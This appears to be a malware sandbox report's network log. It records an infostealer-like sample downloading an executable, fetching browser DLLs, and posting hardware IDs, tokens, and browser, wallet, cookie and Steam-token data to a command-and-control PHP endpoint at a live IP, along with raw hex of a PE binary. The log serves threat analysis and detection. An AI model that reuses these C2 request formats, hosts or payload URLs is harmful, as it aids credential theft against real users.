00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 79 6f 79 6a 70 6c 6a 00 10 00 00 00 c0 31 00 00 04 00 00 00 9e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 31 00 00 22 00 00 00 a2 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 09:53:11 GMTContent-Type: application/octet-streamContent-Length: 503040Last-Modified: Sat, 07 Dec 2024 08:54:32 GMTConnection: keep-aliveETag: "67540d48-7ad00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 35 b3 bf f5 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 54 07 00 00 2e 00 00 00 00 00 00 ee 72 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 72 07 00 53 00 00 00 00 80 07 00 f6 2b 00 00 00 00 00 00 00 00 00 00 00 84 07 00 00 29 00 00 00 c0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 52 07 00 00 20 00 00 00 54 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f6 2b 00 00 00 80 07 00 00 2c 00 00 00 56 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 07 00 00 02 00 00 00 82 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 72 07 00 00 00 00 00 48 00 00 00 02 00 05 00 94 8f 02 00 04 e3 04 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 c0 66 83 e0 34 66 83 e0 12 66 83 e0 07 66 83 e0 80 66 8d 54 24 00 8d 54 24 00 66 b8 32 00 b0 57 c3 00 00 00 00 00 00 31 c0 66 83 e0 57 66 83 e0 00 66 83 e0 07 66 83 e0 80 66 8d 54 24 00 8d 54 24 00 66 b8 57 00 c2 18 00 00 00 1e 02 28 10 00 00 0a 2a 56 28 5a 00 00 06 80 01 00 00 04 28 5b 00 00 06 80 02 00 00 04 2a de 18 8d 3f 00 00 01 25 16 28 92 00 00 0a a2 25 17 28 32 00 00 0a a2 80 0d 00 00 04 18 8d 3f 00 00 01 25 16 28 6d 00 00 06 a2 25 17 28 6e 00 00 06 a2 80 0e 00 00 04 2a 2e 28 6f 00 00 06 80 0f 00 00 04 2a 1e 02 7b 10 00 00 04 2a 22 02 03 7d 10 00 00 04 2a 1e 02 7b 11 00 00 04 2a 22 02 03 7d 11 00 00 04 2a 1e 02 7b 12 00 00 04 2a 22 02 03 7d 12 00 00 04 2a 2e 73 b3 00 00 0a 80 18 00 00 04 2a 2e 73 4f 00 00 06 80 1b 00 00 04 2a 5e 03 7b 14 00 00 04 02 7b 1f 00 00 04 7b 14 00 00 04 28 33 00 00 0a 2a 5e 03 7b 14 00 00 04 02 7b 20 00 00 04 7b 14 00 00 04 28 33 00 00 0a 2a 2e 73 58 00 00 06 80 21 00 00 04 2a 1e 03 6f af 00 00 0a 2

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFCHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 34 46 32 39 30 38 36 36 30 37 34 31 37 30 30 36 36 32 33 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="hwid"3B4F29086607417006623------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="build"drum------CAAEBKEGHJKEBFHJDBFC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"browsers------DAKFIDHDGIEGCAKFIIJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBAEBKJKFIDHJJKJKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 41 45 42 4b 4a 4b 46 49 44 48 4a 4a 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------HDAFBAEBKJKFIDHJJKJKContent-Disposition: form-data; name="message"plugins------HDAFBAEBKJKFIDHJJKJK--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="message"fplugins------BAFCGIJDAFBKFIECBGCA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJHost: 185.215.113.206Content-Length: 6015Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFIHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 2d 2d 0d 0a Data Ascii: ------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JJJKEHCAKFBFHJKEHCFI--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIIIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 2d 2d 0d 0a Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="file"------DBKEHDGDGHCBGCAKFIII--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 2d 2d 0d 0a Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="file"------HCAFIJDGHCBFHJKFCGIE--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJJKKJJDAAAAAKFHJJHost: 185.215.113.206Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="message"wallets------JDGCFBAFBFHJEBGCAEGH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKEHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 42 47 44 41 41 46 42 4b 45 42 47 44 48 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------FHCBGDAAFBKEBGDHDBKEContent-Disposition: form-data; name="message"files------FHCBGDAAFBKEBGDHDBKE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 43 42 47 44 42 4b 4a 4b 46 48 49 45 43 42 41 2d 2d 0d 0a Data Ascii: ------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------EHJDGCBGDBKJKFHIECBAContent-Disposition: form-data; name="file"------EHJDGCBGDBKJKFHIECBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 2d 2d 0d 0a Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="message"ybncbhylepme------AAKKFHCFIECAAAKEGCFI--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
